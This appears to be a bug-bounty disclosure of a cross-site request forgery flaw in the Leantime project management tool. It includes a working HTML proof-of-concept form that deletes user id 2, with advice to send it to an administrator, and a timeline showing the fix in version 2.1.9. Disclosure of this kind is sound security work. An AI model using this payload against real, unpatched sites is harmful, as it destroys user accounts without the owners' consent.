Cross-Site Request Forgery (CSRF) in leantime/leantime

Valid

Reported on

Aug 17th 2021

✍️ Description

CSRF on deleting a user. There is no token or anti csrf implemented.

🕵️‍♂️ Proof of Concept

Create a .html file (poc.html) for example and copy paste the following code in it. Change localhost to ur domain or ip address.

<html><head>
<title>CSRF PoC</title>
</head><body>
<form action="http://localhost/users/delUser/2" method="POST">
<input type="text" name="del" value="Yes%252C+delete%2521" /><br />
<input type='submit' value='Go!' />
</form>
</body></html>

send this file to a admin when he opens the file the user with id 2 is getting deleted instantly. see the screenshot where there are still two users. alt text

screenshot when the admin decides to click on it alt text

after clicking on Go, the next screen is showed where the user with id 2 (test) no longer exists. alt text

💥 Impact

This vulnerability is capable of deleting an user account. If you send the admin the link and he clicks on it the user will be deleted instantly because there is no csrf protection. With this attack you can delete users.

💥 References

https://owasp.org/www-community/attacks/csrf

https://portswigger.net/web-security/csrf

We have contacted a member of the leantime team and are waiting to hear back 2 years ago
Marcel Folaron validated this vulnerability 2 years ago
ribersec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Marcel Folaron marked this as fixed in 2.1.9 with commit c204bc a year ago
Marcel Folaron has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation